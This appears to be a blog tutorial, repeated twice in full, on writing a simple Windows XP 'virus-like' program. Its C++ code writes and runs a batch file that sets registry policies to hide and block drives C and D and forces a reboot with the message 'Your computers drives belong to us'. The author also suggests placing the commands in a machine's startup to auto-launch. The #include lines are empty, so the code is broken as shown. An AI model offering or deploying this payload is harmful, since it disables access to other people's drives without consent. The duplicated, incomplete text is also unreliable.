Let me begin this blog by saying that building a virus to attack a computer or nextwork that is not yours, or which you are not authorised to attack is highly illegal. This tutorial is only for educational purposes. This code is presented "as is" and you should not use it--unless you can figure out how to undo it on your own...
That being said--today we are going to discuss how to make a simple Windows XP virus-like program that makes your hard-drives appear to disappear. They aren't really gone--just hidden.
How do we do this? HKEY values. Drive A is denoted by 1, Drive B is 2, Drive C is 4, Drive D is 8, Drive E is 16, ect. The value doubles all the way to the Z drive. If I wanted to disable the A drive through the D Drive, we would add A+D, i.e. 1+8=9. If we wanted the C through D drives, it would be 4+8=12.
This is what the line REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n accomplishes. NoViewonDrives keeps the Explorer from displaying the drives--NoDrives blocks access.
This is the code you will need. Copy it and save it as a .cpp file. This code was compiled using the Cygwin compiler and will need different libraries if you intend to use something like Visual C++. Cygwin is a good Unix emulator. However, you must compile your .cpp folder that the cyggcc_s-1.dll, cygstdc++-6.dll and cygwin1.dll are stored, or it will not compile. In addition, when you execute your a.exe file, it must be executed with the 3 above mentioned .dll files in the same folder.
Yes--I could have made the package more elegant--but since this is not intended to actually be used as a "real" virus, I thought I'd leave some mystery to deployment.
That being said, this is the code.
#include
#include
#include
#include
using namespace::std;
int main()
{
ofstream write("V9.bat" ); //opening or creating new .bat file
//hide the drivers
write<< "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n";
//don't let anyone use the run function to get to the drivers
write<< "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n";
write<<"shutdown -r -c \"Your computers drives belong to us\" -f"<<"\n";
write<<"Resistance is futile";
write.close(); //close file
ShellExecute(NULL,"open","V9.bat ",NULL,NULL,SW_SHOWNORMAL);
return 0;
}
This is what the code does when it executes. Pardon the blurry image
And this is what the computer looked like when it fired up again. Yes--for all those nerds out there wondering--I was testing it in a virtualbox. Notice that the only thing visible is the E Drive. C and D are gone.
Notice that you could just copy/paste out all the commands that are sent to the .bat file--create the file yourself and store it in the program start-up of a computer to auto launch on its own...
As you can see, HKEYs can often be the key to creating viruses--and the first place to look when troubleshooting for one on your own machine.
That being said--today we are going to discuss how to make a simple Windows XP virus-like program that makes your hard-drives appear to disappear. They aren't really gone--just hidden.
How do we do this? HKEY values. Drive A is denoted by 1, Drive B is 2, Drive C is 4, Drive D is 8, Drive E is 16, ect. The value doubles all the way to the Z drive. If I wanted to disable the A drive through the D Drive, we would add A+D, i.e. 1+8=9. If we wanted the C through D drives, it would be 4+8=12.
This is what the line REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n accomplishes. NoViewonDrives keeps the Explorer from displaying the drives--NoDrives blocks access.
This is the code you will need. Copy it and save it as a .cpp file. This code was compiled using the Cygwin compiler and will need different libraries if you intend to use something like Visual C++. Cygwin is a good Unix emulator. However, you must compile your .cpp folder that the cyggcc_s-1.dll, cygstdc++-6.dll and cygwin1.dll are stored, or it will not compile. In addition, when you execute your a.exe file, it must be executed with the 3 above mentioned .dll files in the same folder.
Yes--I could have made the package more elegant--but since this is not intended to actually be used as a "real" virus, I thought I'd leave some mystery to deployment.
That being said, this is the code.
#include
#include
#include
#include
using namespace::std;
int main()
{
ofstream write("V9.bat" ); //opening or creating new .bat file
//hide the drivers
write<< "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n";
//don't let anyone use the run function to get to the drivers
write<< "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n";
write<<"shutdown -r -c \"Your computers drives belong to us\" -f"<<"\n";
write<<"Resistance is futile";
write.close(); //close file
ShellExecute(NULL,"open","V9.bat ",NULL,NULL,SW_SHOWNORMAL);
return 0;
}
This is what the code does when it executes. Pardon the blurry image
And this is what the computer looked like when it fired up again. Yes--for all those nerds out there wondering--I was testing it in a virtualbox. Notice that the only thing visible is the E Drive. C and D are gone.
Notice that you could just copy/paste out all the commands that are sent to the .bat file--create the file yourself and store it in the program start-up of a computer to auto launch on its own...
As you can see, HKEYs can often be the key to creating viruses--and the first place to look when troubleshooting for one on your own machine.
